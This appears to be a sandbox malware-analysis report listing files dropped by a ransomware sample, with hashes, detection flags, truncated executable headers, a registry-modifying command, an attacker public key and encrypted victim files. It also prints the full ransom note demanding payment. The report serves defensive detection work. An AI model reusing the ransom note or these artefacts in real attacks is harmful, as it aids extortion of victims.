SHA-512:	33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
Malicious:	false
Preview:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\user\AppData\Local\Temp\E609.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	751104
Entropy (8bit):	7.759444131721117
Encrypted:	false
SSDEEP:	12288:unvpi0XtAWoEn3O4WsiCIJdbUa0OWv4f5GWzH9MgInKa8fbM:unsk+4WxCIJJ6ef5PugIniTM
MD5:	3EEDC2AE680453B8CA3B23FD15F529A7
SHA1:	4B1CB1070C23BEA1ABDE90A6329CBF45059E8AE4
SHA-256:	9BDB0941FB313CB0726068C73E28A31CFCDFD245E56666E6C86D78918EA85AEC
SHA-512:	E9075B16347404B61DF5698BB055284F94F686ED318EA6F71B93E924AA25E19B2E27F516909EE9787B6BF9925320403DFF6D5825B3199EDBF2F46608A4E57D9B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L...%9(d.....................\.......C............@..........................`......EO.......................................j..P.......h...........................Tj..............................`_..@...............l............................text............................... ..`.rdata..Hr.......t..................@..@.data...`........F...\..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\VirtualStore\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.893644520875933
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
MD5:	B65D7C11FCF0D75B3E599B80543A852D
SHA1:	D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
SHA-256:	D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
SHA-512:	EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	557
Entropy (8bit):	6.017036102656592
Encrypted:	false
SSDEEP:	12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
MD5:	C4C2A009303D43379B6505DAE754CB92
SHA1:	FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
SHA-256:	F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
SHA-512:	C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rujtcgu

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	240128
Entropy (8bit):	6.761135023384828
Encrypted:	false
SSDEEP:	3072:IMyOsyYDXRL9QTYtSH+E5l675WmXVxS0VRqmVq+h56cphuoqL54ee6UWGG80yWJx:KpLRLa0t0q60Nqmhuoq2eehRGZpJT
MD5:	A25AC46E5BEA920465D1838177782E5B
SHA1:	7ABF711CAC6FF5F35FC0B3F435D6EC5D9B0A0298
SHA-256:	4F367A58544F96F8D0DD19D323ACF0DB1437D2CD8EF96324A37EA7BE20CABF36
SHA-512:	A469ACBFC356DF68532EAF869EE0E56C7AD8323FAF4A5C63D01BACB6514232EB0F4DEFB389CC893E8FE4B31FE1B672D7E5C026711B7590030AE87B433E6F93A4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L......d.............................C............@.................................z........................................j..P.......h...........................Tj..............................`_..@...............l............................text............................... ..`.rdata..Hr.......t..................@..@.data....3.......z...\..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rujtcgu:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\AIXACVYBSB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838616723127105
Encrypted:	false
SSDEEP:	24:jMSa1JXqaW8vTXhrJNzBhCQ/hdY5Sk8f6RnIf/T+rCuC9cZUabD:oSa1JXqzwrhrzlq5SkNRGa421D
MD5:	823886C23AFC9FA48F4E9C8AA0AB1734
SHA1:	B21552833BBAB2CD07B8E4D1FC20CF2158C8DF22
SHA-256:	F35379AE8153531E0F8A0E15C89CC1FAAE845F465BC11F749249DC0FA7677D40
SHA-512:	B7632F202103CCC78FB5E871B9ECC5E27DB29965D8A8E931A75AFE40F7E7891D239E1A7C9359F1D5CEE027D5DBA69251AE2D8A6D0FD267673C9F3F746471B79C
Malicious:	false
Preview:	AIXAC.^....(M`....B.T.v.c.?....R....L......F-....~.g.c%.{..\.!!.C..x.yJ..&.32.........q....Q.i.l....%..V..%........On..Z.X}>.`...f...F.E~R...ME...8.Uw....S.l,"4..u....~.;(}.\|.:)..X>....8Eh(.%].CfW#j.(.).0.]$A...k..d...].;.G..Nq.:E[...=.j2....3..~{...i=....~."~.6mK.'?.+..NM..5.}.eX....s.+.!.tR.'....N.\yI.>..]9lR.....-+@...W..9..}...Ofi...~.[]....W..#..\?L.....c>.9{.T.."S.DL..w......^P..n../lr.U.....].?....KpWP..7..@.0....<...-...&.b <..?..`.....e...n..?.7YX+.....+.g.f.>'....F..@Z3sJ...dr".{.4.t....F..ag...m........t.......8.2...B.)..].\.$P.O..f.q.v..P...8I,n.r!xU..HU..~$;...a.....u.6.m.....3Q.\|.y..I.`....;_...R.'hnt)D... B...^)..W.n.j...W..D..1...0...f.....LG.<:.{j.l.f.....,%.WC..A...z.C....9.ER.}F<.......~3...l.4..........lv.....V.!.....rT.....CP.0...h%`....O#.......^...{.L.....TeJ(O.g...^o..Q3....W^..'...Ye.....px0pE.).u}?g....3.5~......d..7..5..l~.....b...X...(G..z.....[.f...I.v.Cw.S...f.....Z<.,..zB.(..f ........^...............Y..

C:\Users\user\Desktop\AIXACVYBSB.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838616723127105
Encrypted:	false
SSDEEP:	24:jMSa1JXqaW8vTXhrJNzBhCQ/hdY5Sk8f6RnIf/T+rCuC9cZUabD:oSa1JXqzwrhrzlq5SkNRGa421D
MD5:	823886C23AFC9FA48F4E9C8AA0AB1734
SHA1:	B21552833BBAB2CD07B8E4D1FC20CF2158C8DF22
SHA-256:	F35379AE8153531E0F8A0E15C89CC1FAAE845F465BC11F749249DC0FA7677D40
SHA-512:	B7632F202103CCC78FB5E871B9ECC5E27DB29965D8A8E931A75AFE40F7E7891D239E1A7C9359F1D5CEE027D5DBA69251AE2D8A6D0FD267673C9F3F746471B79C
Malicious:	false
Preview:	AIXAC.^....(M`....B.T.v.c.?....R....L......F-....~.g.c%.{..\.!!.C..x.yJ..&.32.........q....Q.i.l....%..V..%........On..Z.X}>.`...f...F.E~R...ME...8.Uw....S.l,"4..u....~.;(}.\|.:)..X>....8Eh(.%].CfW#j.(.).0.]$A...k..d...].;.G..Nq.:E[...=.j2....3..~{...i=....~."~.6mK.'?.+..NM..5.}.eX....s.+.!.tR.'....N.\yI.>..]9lR.....-+@...W..9..}...Ofi...~.[]....W..#..\?L.....c>.9{.T.."S.DL..w......^P..n../lr.U.....].?....KpWP..7..@.0....<...-...&.b <..?..`.....e...n..?.7YX+.....+.g.f.>'....F..@Z3sJ...dr".{.4.t....F..ag...m........t.......8.2...B.)..].\.$P.O..f.q.v..P...8I,n.r!xU..HU..~$;...a.....u.6.m.....3Q.\|.y..I.`....;_...R.'hnt)D... B...^)..W.n.j...W..D..1...0...f.....LG.<:.{j.l.f.....,%.WC..A...z.C....9.ER.}F<.......~3...l.4..........lv.....V.!.....rT.....CP.0...h%`....O#.......^...{.L.....TeJ(O.g...^o..Q3....W^..'...Ye.....px0pE.).u}?g....3.5~......d..7..5..l~.....b...X...(G..z.....[.f...I.v.Cw.S...f.....Z<.,..zB.(..f ........^...............Y..

C:\Users\user\Desktop\AIXACVYBSB\AIXACVYBSB.docx

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	modified
Size (bytes):	1360
Entropy (8bit):	7.854100600114598
Encrypted:	false
SSDEEP:	24:bUOBry+PcJhxPzRcGaMMLGAt9250pPDmo5I4qKEfNXXEZ4JW4/bD:bUOBFPuTOGaJ7c5037Ff4JLD
MD5:	928685922442548F41643B938A4BE9A1
SHA1:	1F045F3F65AA0186C820E6F040757BEEA3DAB3CD
SHA-256:	0DC51CC396163DEF8198CFFE64B676FBCF3719C895649815882B796D537FF10F
SHA-512:	FE90A0E4B42500D988A8F9B44186E6D5378F18AEC1C24F33BEEBE90207B7EC10D9F5148967C1CBDB52F32874D7E944314087F82EF3BDDB88AB3F9499575B126E
Malicious:	false
Preview:	AIXACNg.&......t8..&y.2.N~.V. .....?6..+.y=NS.!.....=...w.9KA.J.2.9.....\~.'z.g..;h...j...YC'.&..Z.&...TM.l.{....2.W.S..ICR3.T aw.?`,h ..S..;w..,...........A...\|..I.X.}.......{h...[.\6..(.7...(....e.5......y...6....f-]:..Nl.......f..v8..Z_J....q.Yx....>..F..M.....)B../.DK..3.;o.{....!.Yt....E...bk$~..........!&7.......OC.....Ql..]u.b..U...f.,.A./u.]..LV.~.r;..v.,.l...$....d.h{&.[.5....`.~P..`..?..3...S%..q6q.......1.H..&..Hb.h...1W.......n.Hc)..g..5...,.j;.l{.8...9+....\T...H. ......7...W......iB/..Bt.{...q.../.Mn...~@..A.bz....k[<...x1.z~pan..}.\.iTG]c5.\..5../d.......v........N.1...xj.:/F..%<..c...'N.6..5=.2..Y3.Bc..F..E.P.u.,Q`(1.....S.}...P.`CV.A.ljS.e..y..D#...}.......P.p...o6.q......YC.c.....u......~...l..~'...3..../nBI.....L....3.-!i2V.e.....b..q...ZY#.k..5.E...}.Rl........_.... ...~.....n.Fv..?..C;....=.(.*4.G.c.J.Zj..`.p..1tA^.../.ot.."...a......B....69..0....4D...\ ..5p.;x6.....)NL.c.b.H[R.......LDY7.]........X4.=.YY.f....O.Ka...

C:\Users\user\Desktop\AIXACVYBSB\AIXACVYBSB.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854100600114598
Encrypted:	false
SSDEEP:	24:bUOBry+PcJhxPzRcGaMMLGAt9250pPDmo5I4qKEfNXXEZ4JW4/bD:bUOBFPuTOGaJ7c5037Ff4JLD
MD5:	928685922442548F41643B938A4BE9A1
SHA1:	1F045F3F65AA0186C820E6F040757BEEA3DAB3CD
SHA-256:	0DC51CC396163DEF8198CFFE64B676FBCF3719C895649815882B796D537FF10F
SHA-512:	FE90A0E4B42500D988A8F9B44186E6D5378F18AEC1C24F33BEEBE90207B7EC10D9F5148967C1CBDB52F32874D7E944314087F82EF3BDDB88AB3F9499575B126E
Malicious:	false
Preview:	AIXACNg.&......t8..&y.2.N~.V. .....?6..+.y=NS.!.....=...w.9KA.J.2.9.....\~.'z.g..;h...j...YC'.&..Z.&...TM.l.{....2.W.S..ICR3.T aw.?`,h ..S..;w..,...........A...\|..I.X.}.......{h...[.\6..(.7...(....e.5......y...6....f-]:..Nl.......f..v8..Z_J....q.Yx....>..F..M.....)B../.DK..3.;o.{....!.Yt....E...bk$~..........!&7.......OC.....Ql..]u.b..U...f.,.A./u.]..LV.~.r;..v.,.l...$....d.h{&.[.5....`.~P..`..?..3...S%..q6q.......1.H..&..Hb.h...1W.......n.Hc)..g..5...,.j;.l{.8...9+....\T...H. ......7...W......iB/..Bt.{...q.../.Mn...~@..A.bz....k[<...x1.z~pan..}.\.iTG]c5.\..5../d.......v........N.1...xj.:/F..%<..c...'N.6..5=.2..Y3.Bc..F..E.P.u.,Q`(1.....S.}...P.`CV.A.ljS.e..y..D#...}.......P.p...o6.q......YC.c.....u......~...l..~'...3..../nBI.....L....3.-!i2V.e.....b..q...ZY#.k..5.E...}.Rl........_.... ...~.....n.Fv..?..C;....=.(.*4.G.c.J.Zj..`.p..1tA^.../.ot.."...a......B....69..0....4D...\ ..5p.;x6.....)NL.c.b.H[R.......LDY7.]........X4.=.YY.f....O.Ka...

C:\Users\user\Desktop\AIXACVYBSB\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8500281820042295
Encrypted:	false
SSDEEP:	24:trcFrn8l9pCond3u9qHcX70IJ5hnjs0FhtpN3gxFUOL7eEJs0kn8imbD:Vk89xnd4Rxs0FvsxFAEJPknd0D
MD5:	5055C841B7E2CDC1D5DD3F7776E5B6CB
SHA1:	3444D7DEECF3EA0276F34C7FCFC93DAB13E2A074
SHA-256:	F4AE85AC00CBD55AB76C431209E6A79B9595A0184AD1F4A48554FD5FA9BEC89F
SHA-512:	1AB31F46A07059869AE3FC853CAAFCFB348359B44F2117F5E412DC8CD765C7AB76FC0D5E620D833B7D50F5D28792EF047C411CF21CD90DC7CF7EDB3935B01DE8
Malicious:	false
Preview:	DTBZG.....`.\..&cU...!%3.G..h........G\|.:?8...J..T..X;/.......XQ=.lH.R..\.../V<.^.....O.U.-?.r.c,/.uf.!..-...S{...t.+... X..C.km.".8;.D..Z%.+.`...C../........bss.\".e.;.....\.....o.+X..~6.<...... ..W.O.3.Pz.......#........}.H.@...!...N,.s..o.G....:.............@.....'.W..0..t......N#.{.j.q)..=....h...SD.En.-zz.y....E...r_.2.A....u..$.......x~.QZ....v.Ff.?...!....{,...v...H...........:..,..S.$.Ys..P.y6.G...d...5..Wm..N.MU........B...!.>.....n...y.&2...T..yq.k?#A'.8..$.oZ.(<.`..j...0..0.\|X..78...Y&.c........r\'z.@.2......4..ly../7M1.3[.r...c.T.....#..w.9fy[...w..q..........n..f.a./~..z^..P.lIvj......mE\|.].....5!l5...J3.<.$+Mt.\.<.....%d@..;.X...t.s_..&"h.nW...y...f.dk.........\.B.9.....Z{/i.k.$.........W.U/p...@FA.s4..PH..x..8.pO$.....p..rd...9.Spk.$cV.N2..t ..o.3.d.d"..M......6....2.)...C.....m.W.Y.q..O. .V..f..'-pV...........(zU...(.$.k...^.x\|...U$..~..K..7a......8.h%t=,..k.%.. .L.).D3..y.;vM[i....."<aF...X...E%.w......`...~n..S.'9

C:\Users\user\Desktop\AIXACVYBSB\DTBZGIOOSO.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8500281820042295
Encrypted:	false
SSDEEP:	24:trcFrn8l9pCond3u9qHcX70IJ5hnjs0FhtpN3gxFUOL7eEJs0kn8imbD:Vk89xnd4Rxs0FvsxFAEJPknd0D
MD5:	5055C841B7E2CDC1D5DD3F7776E5B6CB
SHA1:	3444D7DEECF3EA0276F34C7FCFC93DAB13E2A074
SHA-256:	F4AE85AC00CBD55AB76C431209E6A79B9595A0184AD1F4A48554FD5FA9BEC89F
SHA-512:	1AB31F46A07059869AE3FC853CAAFCFB348359B44F2117F5E412DC8CD765C7AB76FC0D5E620D833B7D50F5D28792EF047C411CF21CD90DC7CF7EDB3935B01DE8
Malicious:	false
Preview:	DTBZG.....`.\..&cU...!%3.G..h........G\|.:?8...J..T..X;/.......XQ=.lH.R..\.../V<.^.....O.U.-?.r.c,/.uf.!..-...S{...t.+... X..C.km.".8;.D..Z%.+.`...C../........bss.\".e.;.....\.....o.+X..~6.<...... ..W.O.3.Pz.......#........}.H.@...!...N,.s..o.G....:.............@.....'.W..0..t......N#.{.j.q)..=....h...SD.En.-zz.y....E...r_.2.A....u..$.......x~.QZ....v.Ff.?...!....{,...v...H...........:..,..S.$.Ys..P.y6.G...d...5..Wm..N.MU........B...!.>.....n...y.&2...T..yq.k?#A'.8..$.oZ.(<.`..j...0..0.\|X..78...Y&.c........r\'z.@.2......4..ly../7M1.3[.r...c.T.....#..w.9fy[...w..q..........n..f.a./~..z^..P.lIvj......mE\|.].....5!l5...J3.<.$+Mt.\.<.....%d@..;.X...t.s_..&"h.nW...y...f.dk.........\.B.9.....Z{/i.k.$.........W.U/p...@FA.s4..PH..x..8.pO$.....p..rd...9.Spk.$cV.N2..t ..o.3.d.d"..M......6....2.)...C.....m.W.Y.q..O. .V..f..'-pV...........(zU...(.$.k...^.x\|...U$..~..K..7a......8.h%t=,..k.%.. .L.).D3..y.;vM[i....."<aF...X...E%.w......`...~n..S.'9

C:\Users\user\Desktop\AIXACVYBSB\ONBQCLYSPU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84878662824341
Encrypted:	false
SSDEEP:	24:k41JGA045e1CqhS/QssEeOktY/kvtiZEfbUFZA9cgCy+zTbD:k4bGdAeMbQsL1/kvti6T5ky+7D
MD5:	FC82A72894DC5FA43139A98B601F4450
SHA1:	D1BDD439DD26894F44151B14A802AA3D30578B19
SHA-256:	5CD9724795D71F0D428C11BBFA46E9512C3239142BDC265165D91B2DB96A8A76
SHA-512:	29F7BCF496B03ECBAE1C5963F21EB918EB4AE759BD6132804644C9E29A66055BAA86EC48083007A4D8815D47A3C175EBCDE7DEF9484C0F01919CD3701B8250BA
Malicious:	false
Preview:	ONBQC...i...F.>.x..:?........7FR..J8.U....9....../\|.(.?.X...%.K!I..V.8E...f........PD.R...!....]YaU.......-Z.,..w~S...#....@F.pE>.yH..2.#...v.1>...#.r_....'..B..E.%.Ef...=...-A.lz.'.zg......_^.X.\R...4T.y......k...ZNU..E..%.9+.a..%..~.......i.~..a..:.=c....w...i...^.....4?...lpsDG.......jR ...........y1.Bf..N.".....\|...!XLZ........T.....d$9D....}.....q..Ky....].F..._..o!...%.,j.%Z...k..@j.D.........Is..{.=..j.Y.Bn>..b.......&........kj.<ADb.......O....YU..1h.....$.....c.._."......X8.{..:..2....;\|..o.]J..}O....\|................M..~V.G.(D7.!...T.....O......(.H...y.p;C. K..A.[./.y.@..5'.....h...@..9..TZQ...;.....5",.n.c&.Z-.P.(.;...K..\|..I..>..N .n" ..p.&.Rk.h.n'.FZ.j..v.6v...PD;j<.V.8Y..4A#gN].NX........U9.+)...^+.8.....Rw..5F...G].....o.....e.....b,.#<....I.@d\....y.g.Co.x.0q......i.N.[...K.......V.1s"S+..#..-..I.&s..h..[z.E....a......v.;..Y.H..(.......&%...J.u.....&d.(... .e...A.n...D...mG{......HU..o=..g.-@.\.....'.....$.P.xP..

C:\Users\user\Desktop\AIXACVYBSB\ONBQCLYSPU.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84878662824341
Encrypted:	false
SSDEEP:	24:k41JGA045e1CqhS/QssEeOktY/kvtiZEfbUFZA9cgCy+zTbD:k4bGdAeMbQsL1/kvti6T5ky+7D
MD5:	FC82A72894DC5FA43139A98B601F4450
SHA1:	D1BDD439DD26894F44151B14A802AA3D30578B19
SHA-256:	5CD9724795D71F0D428C11BBFA46E9512C3239142BDC265165D91B2DB96A8A76
SHA-512:	29F7BCF496B03ECBAE1C5963F21EB918EB4AE759BD6132804644C9E29A66055BAA86EC48083007A4D8815D47A3C175EBCDE7DEF9484C0F01919CD3701B8250BA
Malicious:	false
Preview:	ONBQC...i...F.>.x..:?........7FR..J8.U....9....../\|.(.?.X...%.K!I..V.8E...f........PD.R...!....]YaU.......-Z.,..w~S...#....@F.pE>.yH..2.#...v.1>...#.r_....'..B..E.%.Ef...=...-A.lz.'.zg......_^.X.\R...4T.y......k...ZNU..E..%.9+.a..%..~.......i.~..a..:.=c....w...i...^.....4?...lpsDG.......jR ...........y1.Bf..N.".....\|...!XLZ........T.....d$9D....}.....q..Ky....].F..._..o!...%.,j.%Z...k..@j.D.........Is..{.=..j.Y.Bn>..b.......&........kj.<ADb.......O....YU..1h.....$.....c.._."......X8.{..:..2....;\|..o.]J..}O....\|................M..~V.G.(D7.!...T.....O......(.H...y.p;C. K..A.[./.y.@..5'.....h...@..9..TZQ...;.....5",.n.c&.Z-.P.(.;...K..\|..I..>..N .n" ..p.&.Rk.h.n'.FZ.j..v.6v...PD;j<.V.8Y..4A#gN].NX........U9.+)...^+.8.....Rw..5F...G].....o.....e.....b,.#<....I.@d\....y.g.Co.x.0q......i.N.[...K.......V.1s"S+..#..-..I.&s..h..[z.E....a......v.;..Y.H..(.......&%...J.u.....&d.(... .e...A.n...D...mG{......HU..o=..g.-@.\.....'.....$.P.xP..

C:\Users\user\Desktop\AIXACVYBSB\UMMBDNEQBN.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848756077514907
Encrypted:	false
SSDEEP:	24:Y5pv0oYiZbZtmHxM0aLYVxGuQpIk/kkcbtjqpP6SJ/Kme3smCec3QzjbD:Kpv3rdZYHxMOVxGuY18xjqFHJ/lfA7D
MD5:	4268CB486AEECD1FFB6B3809232FEC49
SHA1:	EBD2551447DF7353F5C61090E9AD0185FFEBBF6D
SHA-256:	1DE76103EA1971371A504B72230113032461198F51F07556594EC167214CCC77
SHA-512:	B605FC7539C0CC5E5434DCC57CE1CB6D7FD56A1441FA3E2ECA51918BCBFE968DB7F5A6934B465B9D856C2F815D0BF2D68219A573A2A99C7ECE5D4F1507D0CEAA
Malicious:	false
Preview:	UMMBD.?.z8$....\s........./%.e....O&X.P.K..tnmW.V...f.=.Ri..ZX....'.....V2.%4./...`....~b...Z$N.z..Oa.i4.r6.dx.?..........1..e..u...,..5R.I...=.X.r.6......F[5.4.2.s.....'!.... .......;..}6n]l.....V.m..L..<rK.v.wS.. gl....q%1.1...s..gt..~...7....Qh...-...X^2..;.f.m...........&T...m.k_a.......0..y.v..P..I.w......u.`QiZ=E.&K5Z,.........W.W&...d..kB.1.m...E.r..E........%....r.P..w......B8z...-I.e..t..+...RV.A...+(..f.b..te..`..8...\E.fa.E.}.W.^...Mu...c....TDV.$.??.".......U.M..+.>EV..`.C.xmc@..^A)rGDn..^2..M...w...B...fr.)7.@=.Q.4.{..N[.b.%.H..% ......@]V...Yp.xg9...[..$.#.W..$...h.(#W.\|..h.,.l`.,0...&..i.;I=.c..S..\|..:I.>l...o.>.!...W.2sS;-.eN...N..0..T..R.f....%..S.g..3.............&...<.R.=7..,.....W...s+......^.l%...x..t.o...".#...T......d....S.@.uu..u.S..........:......x. .4.-..:...*.N.....N...X...I..-.<./.A.Ty..G..y.i.\|....<~..+]..nC?.pS.yb..<W..2...Y.@i.....v41\|9.....[.Y...5.,.Z.....HmpN...2.......x.....lR.=.....K^..Q....;.Z....F...{..H

C:\Users\user\Desktop\AIXACVYBSB\UMMBDNEQBN.mp3.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848756077514907
Encrypted:	false
SSDEEP:	24:Y5pv0oYiZbZtmHxM0aLYVxGuQpIk/kkcbtjqpP6SJ/Kme3smCec3QzjbD:Kpv3rdZYHxMOVxGuY18xjqFHJ/lfA7D
MD5:	4268CB486AEECD1FFB6B3809232FEC49
SHA1:	EBD2551447DF7353F5C61090E9AD0185FFEBBF6D
SHA-256:	1DE76103EA1971371A504B72230113032461198F51F07556594EC167214CCC77
SHA-512:	B605FC7539C0CC5E5434DCC57CE1CB6D7FD56A1441FA3E2ECA51918BCBFE968DB7F5A6934B465B9D856C2F815D0BF2D68219A573A2A99C7ECE5D4F1507D0CEAA
Malicious:	false
Preview:	UMMBD.?.z8$....\s........./%.e....O&X.P.K..tnmW.V...f.=.Ri..ZX....'.....V2.%4./...`....~b...Z$N.z..Oa.i4.r6.dx.?..........1..e..u...,..5R.I...=.X.r.6......F[5.4.2.s.....'!.... .......;..}6n]l.....V.m..L..<rK.v.wS.. gl....q%1.1...s..gt..~...7....Qh...-...X^2..;.f.m...........&T...m.k_a.......0..y.v..P..I.w......u.`QiZ=E.&K5Z,.........W.W&...d..kB.1.m...E.r..E........%....r.P..w......B8z...-I.e..t..+...RV.A...+(..f.b..te..`..8...\E.fa.E.}.W.^...Mu...c....TDV.$.??.".......U.M..+.>EV..`.C.xmc@..^A)rGDn..^2..M...w...B...fr.)7.@=.Q.4.{..N[.b.%.H..% ......@]V...Yp.xg9...[..$.#.W..$...h.(#W.\|..h.,.l`.,0...&..i.;I=.c..S..\|..:I.>l...o.>.!...W.2sS;-.eN...N..0..T..R.f....%..S.g..3.............&...<.R.=7..,.....W...s+......^.l%...x..t.o...".#...T......d....S.@.uu..u.S..........:......x. 